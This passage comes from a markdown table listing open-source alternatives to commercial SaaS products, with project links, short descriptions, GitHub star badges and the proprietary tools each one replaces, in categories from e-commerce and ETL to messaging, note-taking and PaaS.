href=https://github.com/medusajs/medusa><img src="https://img.shields.io/github/stars/medusajs/medusa?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Saleor](https://saleor.io/)|Headless e-commerce platform|<a href=https://github.com/saleor/saleor><img src="https://img.shields.io/github/stars/saleor/saleor?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Shuup](https://shuup.com)|Headless e-commerce platform|<a href=https://github.com/shuup/shuup><img src="https://img.shields.io/github/stars/shuup/shuup?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Sylius](https://sylius.com/)|Headless e-commerce platform|<a href=https://github.com/sylius/sylius><img src="https://img.shields.io/github/stars/sylius/sylius?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Vendure](https://www.vendure.io/)|Headless e-commerce platform|<a href=https://github.com/vendure-ecommerce/vendure><img src="https://img.shields.io/github/stars/vendure-ecommerce/vendure?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Vue Storefront](https://www.vuestorefront.io/)|Frontend for e-commerce platform|<a href=https://github.com/vuestorefront/vue-storefront><img src="https://img.shields.io/github/stars/vuestorefront/vue-storefront?style=social" width=150/></a>|[Shogun](https://getshogun.com/) ELT / ETL|[Airbyte](https://airbyte.io/)|Data integration platform|<a href=https://github.com/airbytehq/airbyte><img src="https://img.shields.io/github/stars/airbytehq/airbyte?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Benthos](https://benthos.dev/)|Data streaming processor with yaml-driven pipeline configuration|<a href=https://github.com/benthosdev/benthos><img src="https://img.shields.io/github/stars/benthosdev/benthos?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Dagster](https://dagster.io/)|Orchestration platform for data assets|<a href=https://github.com/dagster-io/dagster><img src="https://img.shields.io/github/stars/dagster-io/dagster?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Kestra](https://kestra.io/)|orchestration and scheduling platform|<a href=https://github.com/kestra-io/kestra><img src="https://img.shields.io/github/stars/kestra-io/kestra?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Orchest](https://www.orchest.io/)|No-code data pipelines builder|<a href=https://github.com/orchest/orchest><img src="https://img.shields.io/github/stars/orchest/orchest?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Prefect](https://www.prefect.io/)|Data orchestration platform for a modern data stack|<a href=https://github.com/prefecthq/prefect><img src="https://img.shields.io/github/stars/prefecthq/prefect?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Selefra](https://www.selefra.io/)|An open-source policy-as-code software that provides analytics for multi-cloud and SaaS.|<a href=https://github.com/selefra/selefra><img src="https://img.shields.io/github/stars/selefra/selefra?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ERP|[DoliCloud](https://dolicloud.com) | Business management suite (ERP and CRM)|<a href=https://github.com/Dolibarr/dolibarr><img src="https://img.shields.io/github/stars/Dolibarr/dolibarr?style=social" width=150/></a>|[Oracle Fusion ERP Cloud](https://www.oracle.com/erp),[Odoo](https://odoo.com/),[Microsoft Dynamics](https://dynamics.microsoft.com/) ERP|[ERPNext](https://erpnext.com) | Agile, modern, module based Business management suite|<a href=https://github.com/frappe/erpnext><img src="https://img.shields.io/github/stars/frappe/erpnext?style=social" width=150/>|[SAP Business One](https://www.sap.com/products/business-one.html), [Odoo](https://odoo.com/) Email marketing|[Keila](https://www.keila.io/)|Email newsletter tool|<a href=https://github.com/pentacent/keila><img src="https://img.shields.io/github/stars/pentacent/keila?style=social" width=150/></a>|[Mailchimp](https://mailchimp.com), [Sendinblue](https://www.sendinblue.com)| Enterprise Search|[AppBase](https://www.appbase.io/)|Search UI components for React and Vue|<a href=https://github.com/appbaseio/reactivesearch><img src="https://img.shields.io/github/stars/appbaseio/reactivesearch?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Jina.ai](https://jina.ai/)|Neural search framework for 𝙖𝙣𝙮 kind of data (including images)|<a href=https://github.com/jina-ai/jina><img src="https://img.shields.io/github/stars/jina-ai/jina?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Manticore Search](https://manticoresearch.com/)|Easy to use open source fast database for search|<a href=https://github.com/manticoresoftware/manticoresearch/><img src="https://img.shields.io/github/stars/manticoresoftware/manticoresearch?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) Enterprise Search|[Meilisearch](https://www.meilisearch.com/)|Typo tolerant search engine|<a href=https://github.com/meilisearch/meilisearch><img src="https://img.shields.io/github/stars/meilisearch/MeiliSearch?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Qdrant](https://qdrant.tech/)|Vector similarity search engine with extended filtering support|<a href=https://github.com/qdrant/qdrant><img src="https://img.shields.io/github/stars/qdrant/qdrant?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai), [Algolia](https://www.algolia.com/)| Enterprise Search|[SeMI](https://www.semi.technology/)'s [Weaviate](https://github.com/semi-technologies/weaviate)|Real-time vector search engine|<a href=https://github.com/semi-technologies/weaviate><img src="https://img.shields.io/github/stars/semi-technologies/weaviate?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai), [Algolia](https://www.algolia.com/) Enterprise Search|[TypeSense](https://typesense.org/)|Typo tolerant fuzzy search engine|<a href=https://github.com/typesense/typesense><img src="https://img.shields.io/github/stars/typesense/typesense?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Zilliz](https://zilliz.com)'s [Milvus](https://milvus.io)|Vector database for AI applications|<a href=https://github.com/milvus-io/milvus><img src="https://img.shields.io/github/stars/milvus-io/milvus?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai) Enterprise Search|[Zinc Labs](https://www.zinclabs.io)'s [Zinc](https://github.com/prabhatsharma/zinc)|Cloud native full text search|<a href=https://github.com/prabhatsharma/zinc><img src="https://img.shields.io/github/stars/prabhatsharma/zinc?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) Enterprise Search|[deepset](https://www.deepset.ai/)|NLP platform to build enterprise-grade semantic search|<a href=https://github.com/deepset-ai/haystack><img src="https://img.shields.io/github/stars/deepset-ai/haystack?style=social" width=150/></a>|[AWS Kendra](https://aws.amazon.com/kendra/), [QnA Maker](https://www.qnamaker.ai/)| Feature flag and toggle management|[FlagSmith](https://flagsmith.com/)|Feature Flag & Remote Config Service|<a href=https://github.com/Flagsmith/flagsmith><img src="https://img.shields.io/github/stars/Flagsmith/flagsmith?style=social" width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) Feature flag and toggle management|[GrowthBook](https://www.growthbook.io/)|Feature flags and A/B testing|<a href=https://github.com/growthbook/growthbook><img src="https://img.shields.io/github/stars/growthbook/growthbook?style=social" width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) Feature flag and toggle management|[Unleash](https://www.getunleash.io/)|Feature flags platform|<a href=https://github.com/Unleash/unleash><img src="https://img.shields.io/github/stars/Unleash/unleash?style=social" width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) File Hosting|[Filestash](https://www.filestash.app/)|A file manager that let you manage your data anywhere it is located|<a href=https://github.com/mickael-kerjean/filestash><img src="https://img.shields.io/github/stars/mickael-kerjean/filestash?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| File Hosting|[Nextcloud](https://nextcloud.com/)|A personal cloud which runs on your own server|<a href=https://github.com/nextcloud/server><img src="https://img.shields.io/github/stars/nextcloud/server?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| File Hosting|[Owncloud](https://owncloud.com/)|A personal cloud which runs on your own server|<a href=https://github.com/owncloud/core><img src="https://img.shields.io/github/stars/owncloud/core?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/) File Hosting|[Spacedrive](https://spacedrive.com/)|Cross-platform file manager, powered by a virtual distributed filesystem (VDFS) written in Rust|<a href=https://github.com/spacedriveapp/spacedrive><img src="https://img.shields.io/github/stars/spacedriveapp/spacedrive?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| Financial Service|[Lago](https://www.getlago.com/)|Open Source Billing API|<a href=https://github.com/getlago/lago><img src="https://img.shields.io/github/stars/getlago/lago?style=social" width=150/></a>|[Stripe Billing](https://stripe.com/billing), [Chargebee](https://www.chargebee.com/)| Financial Service|[OpenBB Terminal](https://github.com/openbb-finance/OpenBBTerminal)|Investment research for everyone|<a href=https://github.com/GamestonkTerminal/GamestonkTerminal><img src="https://img.shields.io/github/stars/GamestonkTerminal/GamestonkTerminal?style=social" width=150/></a>|[Bloomberg](https://www.bloomberg.com/) Form Building|[FormKit](https://formkit.com/)| A software to help build attractive forms|<a href=https://github.com/formkit/formkit><img src="https://img.shields.io/github/stars/formkit/formkit?style=social" width=150></a>|[Vueform](https://vueform.com/),[Typeform](https://www.typeform.com/) Form Building|[Formbricks](https://formbricks.com/)| Build forms and receive & manage submission data in one platform |<a href=https://github.com/formbricks/formbricks><img src="https://img.shields.io/github/stars/formbricks/formbricks?style=social" width=150></a>|[Typeform](https://www.typeform.com/), [Google Forms](https://forms.google.com), [React Hook Form](https://react-hook-form.com/) Form Building|[Formio](https://form.io/)| A Form and Data Management Platform for Progressive Web Applications|<a href=https://github.com/formio/formio><img src="https://img.shields.io/github/stars/formio/formio?style=social" width=150></a>|[Vueform](https://vueform.com/),[Typeform](https://www.typeform.com/) Forum Software|[Discourse](https://www.discourse.org/)|A platform for community discussion|<a href=https://github.com/discourse/discourse><img src="https://img.shields.io/github/stars/discourse/discourse?style=social" width=150/></a>|[Tribe](https://tribe.so/), [Circle](https://circle.so/) Forum Software|[Vanilla](https://vanillaforums.com/)|A platform for community discussion|<a href=https://github.com/vanilla/vanilla><img src="https://img.shields.io/github/stars/vanilla/vanilla?style=social" width=150/></a>|[Tribe](https://tribe.so/), [Circle](https://circle.so/)| Graph database|[ArangoDB](https://www.arangodb.com/)|Graph database and document store|<a href=https://github.com/arangodb/arangodb><img src="https://img.shields.io/github/stars/arangodb/arangodb?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[Memgraph](https://memgraph.com/)|In-memory graph database|<a href=https://github.com/memgraph/memgraph><img src="https://img.shields.io/github/stars/memgraph/memgraph?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[Neo4j](http://neo4j.com/)|Graph database platform|<a href=https://github.com/neo4j/neo4j><img src="https://img.shields.io/github/stars/neo4j/neo4j?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[TerminusDB](https://terminusdb.com/)|Knowledge graph and document store|<a href=https://github.com/terminusdb/terminusdb><img src="https://img.shields.io/github/stars/terminusdb/terminusdb?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Helpdesk Solution|[Peppermint](https://peppermint.sh)|Ticket Management & Helpdesk system|<a href=https://github.com/Peppermint-Lab/peppermint><img src="https://img.shields.io/github/stars/Peppermint-Lab/peppermint?style=social" width=150/></a>|[Zendesk](https://www.zendesk.co.uk/) Helpdesk Solution|[UVDesk](https://www.uvdesk.com/en/)|Ticket Management & Helpdesk system|<a href=https://github.com/uvdesk/community-skeleton><img src="https://img.shields.io/github/stars/uvdesk/community-skeleton?style=social" width=150/></a>|[Zendesk](https://www.zendesk.co.uk/) Internal Tools|[AppSmith](https://www.appsmith.com/)|Low-code platform for internal tools|<a href=https://github.com/appsmithorg/appsmith><img src="https://img.shields.io/github/stars/appsmithorg/appsmith?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Budibase](https://budibase.com/)|Low-code platform for internal tools|<a href=https://github.com/Budibase/budibase><img src="https://img.shields.io/github/stars/Budibase/budibase?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[ILLA Cloud](https://www.illacloud.com/)|Low-code platform for developers to build internal tools in minutes.|<a href=https://github.com/illacloud/illa-builder><img src="https://img.shields.io/github/stars/illacloud/illa-builder?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Lowdefy](https://lowdefy.com/)|YAML-based low-code platform for internal tools|<a href=https://github.com/lowdefy/lowdefy><img src="https://img.shields.io/github/stars/lowdefy/lowdefy?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Tooljet](https://tooljet.io/)|Low-code framework for internal tools|<a href=https://github.com/tooljet/tooljet><img src="https://img.shields.io/github/stars/tooljet/tooljet?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Windmill](https://windmill.dev/)|Company-wide apps and automations from minimal python or typescript scripts|<a href=https://github.com/windmill-labs/windmill><img src="https://img.shields.io/github/stars/windmill-labs/windmill?style=social" width=150/></a>|[Retool](https://retool.com/)| Localization (i18n)|[Tolgee](https://tolgee.io)|Developer & translator friendly web-based localization platform|<a href=https://github.com/tolgee/tolgee-platform><img src="https://img.shields.io/github/stars/tolgee/tolgee-platform?style=social" width=150/></a>|[Lokalise](https://www.lokalise.com/), [Transifex](https://www.transifex.com/), [Crowdin](https://crowdin.com/), [POEditor](https://poeditor.com/) Localization (i18n)|[inlang](https://www.inlang.com/)|Developer-first localization infrastructure built on git|<a href=https://github.com/inlang/inlang><img src="https://img.shields.io/github/stars/inlang/inlang?style=social" width=150/></a>|[Lokalise](https://www.lokalise.com/), [Transifex](https://www.transifex.com/), [Crowdin](https://crowdin.com/), [POEditor](https://poeditor.com/) Log Management|[Graylog](https://www.graylog.org/)|Log management platform|<a href=https://github.com/Graylog2/graylog2-server><img src="https://img.shields.io/github/stars/Graylog2/graylog2-server?style=social" width=150/></a>|[Splunk](https://www.splunk.com/) Log Management|[Quickwit](https://quickwit.io/)|Cloud-native log management & analytics|<a href=https://github.com/quickwit-oss/quickwit><img src="https://img.shields.io/github/stars/quickwit-oss/quickwit?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) ML Ops|[Cortex](https://www.cortex.dev/)|Production infrastructure for machine learning|<a href=https://github.com/cortexlabs/cortex><img src="https://img.shields.io/github/stars/cortexlabs/cortex?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/) ML Ops|[Metarank](https://metarank.ai)|AutoML style personalized ranking|<a href=https://github.com/metarank/metarank><img src="https://img.shields.io/github/stars/metarank/metarank?style=social" width=150/></a>|[AWS Personalize](https://aws.amazon.com/personalize/), [Tecton](https://www.tecton.ai/)| ML Ops|[MindsDB](https://mindsdb.com/)|In-database machine learning platform|<a href=https://github.com/mindsdb/mindsdb><img src="https://img.shields.io/github/stars/mindsdb/mindsdb?style=social" width=150/></a>|[BigQuery ML](https://cloud.google.com/bigquery-ml/docs)| ML Ops|[Ploomber](https://ploomber.io/)|YAML-based pipeline builder for ML models|<a href=https://github.com/ploomber/ploomber><img src="https://img.shields.io/github/stars/ploomber/ploomber?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/)| ML Ops|[Seldon](https://seldon.io/)|Deployment & monitoring for machine learning at scale|<a href=https://github.com/SeldonIO/seldon-core><img src="https://img.shields.io/github/stars/SeldonIO/seldon-core?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/), [Google Vertex AI](https://cloud.google.com/vertex-ai)| ML Ops|[Zilliz](https://zilliz.com)'s [Towhee](https://towhee.io)|Platform for generating embedding vectors|<a href=https://github.com/towhee-io/towhee><img src="https://img.shields.io/github/stars/towhee-io/towhee?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker)| Marketing SaaS|[Dub](https://dub.sh/)|Open-source Bitly Alternative with built-in analytics|<a href=https://github.com/steven-tey/dub><img src="https://img.shields.io/github/stars/steven-tey/dub?style=social" width=150/></a>|[Bitly](https://bitly.com/) Messaging|[Element](https://element.io/)|Enterprise communication platform|<a href=https://github.com/vector-im/element-web><img src="https://img.shields.io/github/stars/vector-im/element-web?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Mattermost](https://mattermost.com/)|Enterprise communication platform for developers|<a href=https://github.com/mattermost/mattermost-server><img src="https://img.shields.io/github/stars/mattermost/mattermost-server?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Rocket.chat](https://rocket.chat/)|Enterprise communication platform|<a href=https://github.com/RocketChat/Rocket.Chat><img src="https://img.shields.io/github/stars/RocketChat/Rocket.Chat?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Tinode](https://tinode.co/)|General instant messaging|<a href=https://github.com/tinode/chat><img src="https://img.shields.io/github/stars/tinode/chat?style=social" width=150/></a>|[WhatsApp](https://www.whatsapp.com/), [Telegram](https://www.telegram.org/)| Messaging|[Zulip](https://zulip.com/)|Team chat|<a href=https://github.com/zulip/zulip><img src="https://img.shields.io/github/stars/zulip/zulip?style=social" width=150/></a>|[Slack](https://slack.com/)| Metrics store|[Cube.js](https://cube.dev/)|Headless business intelligence suite|<a href=https://github.com/cube-js/cube.js><img src="https://img.shields.io/github/stars/cube-js/cube.js?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[Evidence](https://evidence.dev/)|Lightweight BI using SQL and markdown|<a href=https://github.com/evidence-dev/evidence><img src="https://img.shields.io/github/stars/evidence-dev/evidence?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[LightDash](https://www.lightdash.com/)|Low-code metrics layer, alternative to Looker|<a href=https://github.com/lightdash/lightdash><img src="https://img.shields.io/github/stars/lightdash/lightdash?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[MLCraft](http://mlcraft.io/)|Low-code metrics layer, alternative to Looker|<a href=https://github.com/mlcraft-io/mlcraft><img src="https://img.shields.io/github/stars/mlcraft-io/mlcraft?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[MetriQL](https://metriql.com/)|Headless business intelligence suite|<a href=https://github.com/metriql/metriql><img src="https://img.shields.io/github/stars/metriql/metriql?style=social" width=150/></a>|[Looker](https://looker.com/) No-code database|[Baserow](https://baserow.io/)|No-code database and Airtable alternative|<a href=https://gitlab.com/bramw/baserow><img src="https://about.gitlab.com/images/press/logo/png/gitlab-logo-gray-rgb.png" width=150/></a>|[AirTable](https://www.airtable.com/) No-code database|[NocoDB](https://www.nocodb.com/)|No-code database and Airtable alternative|<a href=https://github.com/nocodb/nocodb><img src="https://img.shields.io/github/stars/nocodb/nocodb?style=social" width=150/></a>|[AirTable](https://www.airtable.com/) No-code database|[Rowy](https://www.rowy.io/)|Extendable Airtable-like spreadsheet UI for databases|<a href=https://github.com/rowyio/rowy><img src="https://img.shields.io/github/stars/rowyio/rowy?style=social" width=150/></a>|[AirTable](https://www.airtable.com/)| No-code database|[Totum](https://totum.online/)|Business database for non-programmers|<a href=https://github.com/totumonline/totum-mit><img src="https://img.shields.io/github/stars/totumonline/totum-mit?style=social" width=150/></a>|[AirTable](https://www.airtable.com/)| Notetaking|[AppFlowy](https://www.appflowy.io/)|Open-source alternative to Notion|<a href=https://github.com/AppFlowy-IO/appflowy><img src="https://img.shields.io/github/stars/AppFlowy-IO/appflowy?style=social" width=150/></a>|[Notion](https://www.notion.so/) Notetaking|[Athens Research](https://www.athensresearch.org/)|Knowledge graph for research and notetaking|<a href=https://github.com/athensresearch/athens><img src="https://img.shields.io/github/stars/athensresearch/athens?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Bangle.io](https://bangle.io/)|A rich note note taking web app that works on top of your locally saved Markdown files|<a href=https://github.com/bangle-io/bangle-io><img src="https://img.shields.io/github/stars/bangle-io/bangle-io?style=social" width=150/></a>|[Notion](https://www.notion.so/)| Notetaking|[Boost Note](https://boostnote.io/)|Collaborative workspace for developer teams|<a href=https://github.com/BoostIO/BoostNote-App><img src="https://img.shields.io/github/stars/BoostIO/BoostNote-App?style=social" width=150/></a>|[Notion](https://www.notion.so/)| Notetaking|[Dendron](https://www.dendron.so/)|Knowledge base plugin for VS Code|<a href=https://github.com/dendronhq/dendron><img src="https://img.shields.io/github/stars/dendronhq/dendron?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Joplin](https://joplinapp.org/)|Secure, Cross-platform, Open-Source Markdown Note Taking App|<a href=https://github.com/laurent22/joplin><img src="https://img.shields.io/github/stars/laurent22/joplin?style=social" width=150/></a>|[Evernote](https://evernote.com/), [Onenote](hhttps://www.onenote.com/n), [Roam Research](https://roamresearch.com/)| Notetaking|[Logseq](https://logseq.com/)|Knowledge base manager|<a href=https://github.com/logseq/logseq><img src="https://img.shields.io/github/stars/logseq/logseq?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Notabase](https://notabase.io)|Powerful and easy-to-use note-taking app for networked thinking|<a href=https://github.com/churichard/notabase><img src="https://img.shields.io/github/stars/churichard/notabase?style=social" width=150/></a>|[Notion](https://www.notion.so/), [Roam Research](https://roamresearch.com/)| Notetaking|[Notesnook](https://notesnook.com/)|A fully open source & end-to-end encrypted note taking alternative to Evernote.|<a href=https://github.com/streetwriters/notesnook><img src="https://img.shields.io/github/stars/streetwriters/notesnook?style=social" width=150/></a>|[Evernote](https://evernote.com/), [OneNote](https://www.onenote.com/n)| Notetaking|[Outline](https://www.getoutline.com/)|Wiki and knowledge base|<a href=https://github.com/outline/outline><img src="https://img.shields.io/github/stars/outline/outline?style=social" width=150/></a>|[Notion](https://notion.so)| Notetaking|[Trilium.cc](https://trilium.cc/)|Personal knowledge base|<a href=https://github.com/zadam/trilium><img src="https://img.shields.io/github/stars/zadam/trilium?style=social" width=150/></a>|[Evernote](https://evernote.com/), [Onenote](https://www.onenote.com/) Observability and monitoring|[Chaos Genius](https://www.chaosgenius.io/)|ML powered analytics engine for outlier/anomaly detection and root cause analysis|<a href=https://github.com/chaos-genius/chaos_genius><img src="https://img.shields.io/github/stars/chaos-genius/chaos_genius?style=social" width=150/></a>|[AWS Lookout](https://aws.amazon.com/lookout-for-metrics/), [Anodot](https://www.anodot.com/), [Sisu Data](https://sisudata.com/), [Outlier](https://outlier.ai/) Observability and monitoring|[Grafana](https://grafana.com/)|Observability and data visualization platform|<a href=https://github.com/grafana/grafana><img src="https://img.shields.io/github/stars/grafana/grafana?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Netdata](https://www.netdata.cloud)|Application monitoring and observability platform|<a href=https://github.com/netdata/netdata><img src="https://img.shields.io/github/stars/netdata/netdata?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Sentry](https://sentry.io/)|Application monitoring with a focus on error reporting|<a href=https://github.com/getsentry/sentry><img src="https://img.shields.io/github/stars/getsentry/sentry?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Signoz](https://signoz.io/)|Application monitoring and observability platform|<a href=https://github.com/signoz/signoz><img src="https://img.shields.io/github/stars/signoz/signoz?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Uptrace](https://uptrace.dev/)|Application monitoring and observability platform|<a href=https://github.com/uptrace/uptrace><img src="https://img.shields.io/github/stars/uptrace/uptrace?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[VictoriaMetrics](https://victoriametrics.com/)|Application monitoring and observability platform|<a href=https://github.com/VictoriaMetrics/VictoriaMetrics><img src="https://img.shields.io/github/stars/victoriametrics/victoriametrics?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Password manager|[BitWarden](https://bitwarden.com/)|Password manager for teams and individuals|<a href=https://github.com/bitwarden/server><img src="https://img.shields.io/github/stars/bitwarden/server?style=social" width=150/></a>|[1Password](https://1password.com/) Password manager|[Padloc](https://padloc.app/)|Password manager for teams and individuals|<a href=https://github.com/padloc/padloc><img src="https://img.shields.io/github/stars/padloc/padloc?style=social" width=150/></a>|[1Password](https://1password.com/)| Password manager|[Passbolt](https://www.passbolt.com/)|Password manager for teams and individuals|<a href=https://github.com/passbolt/passbolt_api><img src="https://img.shields.io/github/stars/passbolt/passbolt_api?style=social" width=150/></a>|[1Password](https://1password.com/) Platform as a service|[Coolify](https://coolify.io/)|Self-hostable Heroku alternative|<a href=https://github.com/coollabsio/coolify><img src="https://img.shields.io/github/stars/coollabsio/coolify?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Dokku](https://dokku.com/)|An open source PAAS alternative to Heroku|<a href=https://github.com/dokku/dokku><img src="https://img.shields.io/github/stars/dokku/dokku?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Otomi](https://otomi.io)|Self-hosted PaaS for Kubernetes|<a href=https://github.com/redkubes/otomi-core><img src="https://img.shields.io/github/stars/redkubes/otomi-core?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Porter](https://porter.run/)|Kubernetes powered PaaS that runs in your own cloud|<a href=https://github.com/porter-dev/porter><img src="https://img.shields.io/github/stars/porter-dev/porter?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Pulumi](https://www.pulumi.com/)|Universal Infrastructure as Code|<a href=https://github.com/pulumi/pulumi><img src="https://img.shields.io/github/stars/pulumi/pulumi?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Qovery](https://www.qovery.com/)|Kubernetes powered PaaS that runs in your own cloud|<a href=https://github.com/Qovery/engine><img src="https://img.shields.io/github/stars/Qovery/engine?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Space Cloud](https://space-cloud.io/)|Serverless cloud deployment platform|<a href=https://github.com/spacecloud-io/space-cloud><img src="https://img.shields.io/github/stars/spacecloud-io/space-cloud?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[dyrector.io](https://dyrector.io)|Simplify container delivery without vendor lock|<a href=https://github.com/dyrector-io/dyrectorio><img src="https://img.shields.io/github/stars/dyrector-io/dyrectorio?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Product Analytics|[Objectiv](https://objectiv.io/)|Product analytics infrastructure|<a href=https://github.com/objectiv/objectiv-analytics><img src="https://img.shields.io/github/stars/objectiv/objectiv-analytics?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/analytics/web/), [Amplitude](https://amplitude.com/), [Mixpanel](https://mixpanel.com/)| Product Analytics|[PostHog](https://posthog.com/)|Product analytics platform|<a href=https://github.com/PostHog/posthog><img src="https://img.shields.io/github/stars/PostHog/posthog?style=social" width=150/></a>|[Amplitude](https://amplitude.com/), [MixPanel](https://mixpanel.com/) Project Management|[Focalboard](https://www.focalboard.com/)|Alternative to Trello, Notion, and Asana|<a href=https://github.com/mattermost/focalboard><img src="https://img.shields.io/github/stars/mattermost/focalboard?style=social" width=150/></a>|[Trello](https://trello.com/), [Notion](https://www.notion.so/), [Asana](https://asana.com/)| Project Management|[OpenProject](https://www.openproject.org/)|Project management software|<a href=https://github.com/opf/openproject><img src="https://img.shields.io/github/stars/opf/openproject?style=social" width=150/></a>|[Asana](https://asana.com/), [Trello](https://trello.com/)| Project Management|[Plane](https://plane.so/)|Alternative to Linear, JIRA, Trello and Height|<a href=https://github.com/makeplane/plane><img src="https://img.shields.io/github/stars/makeplane/plane?style=social" width=150/></a>|[Linear](https://linear.app/), [JIRA](https://www.atlassian.com/software/jira), [Trello](https://trello.com/), [Height](https://height.app/)| Project Management|[Taiga](https://www.taiga.io/)|Project management software|<a href=https://github.com/kaleidos-ventures/taiga-docker><img src="https://img.shields.io/github/stars/kaleidos-ventures/taiga-docker?style=social" width=150/></a>|[Asana](https://asana.com/), [Trello](https://trello.com/), [Jira](https://www.atlassian.com/software/jira)| Project Management|[Vikunja](https://vikunja.io/)|The to-do app to organize your next project.|<a href=https://github.com/go-vikunja/api><img src="https://img.shields.io/github/stars/go-vikunja/api?style=social" width=150/></a>|[Todoist](https://todoist.com), [Trello](https://trello.com), [Asana](https://asana.com)| Relational database|[PingCAP](https://en.pingcap.com/)|NewSQL database that supports HTAP workloads|<a href=https://github.com/pingcap/tidb><img src="https://img.shields.io/github/stars/pingcap/tidb?style=social" width=150/></a>|[Amazon Aurora](https://aws.amazon.com/rds/aurora/), [Google Cloud Spanner](https://cloud.google.com/spanner/)| Relational database|[Yugabyte](https://www.yugabyte.com/)|High-performance distributed SQL database|<a href=https://github.com/yugabyte/yugabyte-db><img src="https://img.shields.io/github/stars/yugabyte/yugabyte-db?style=social" width=150/></a>|[Amazon Aurora](https://aws.amazon.com/rds/aurora/), [Google Cloud Spanner](https://cloud.google.com/spanner/)| Remote Desktop Application|[RustDesk](https://rustdesk.com/)|Open source virtual / remote desktop infrastructure for everyone|<a href=https://github.com/rustdesk/rustdesk><img src="https://img.shields.io/github/stars/rustdesk/rustdesk?style=social" width=150/></a>|[TeamViewer](https://teamviewer.com)| Reverse ETL|[Castled](https://castled.io/)|Data synchronization framework focused on external apps|<a href=https://github.com/castledio/castled><img src="https://img.shields.io/github/stars/castledio/castled?style=social" 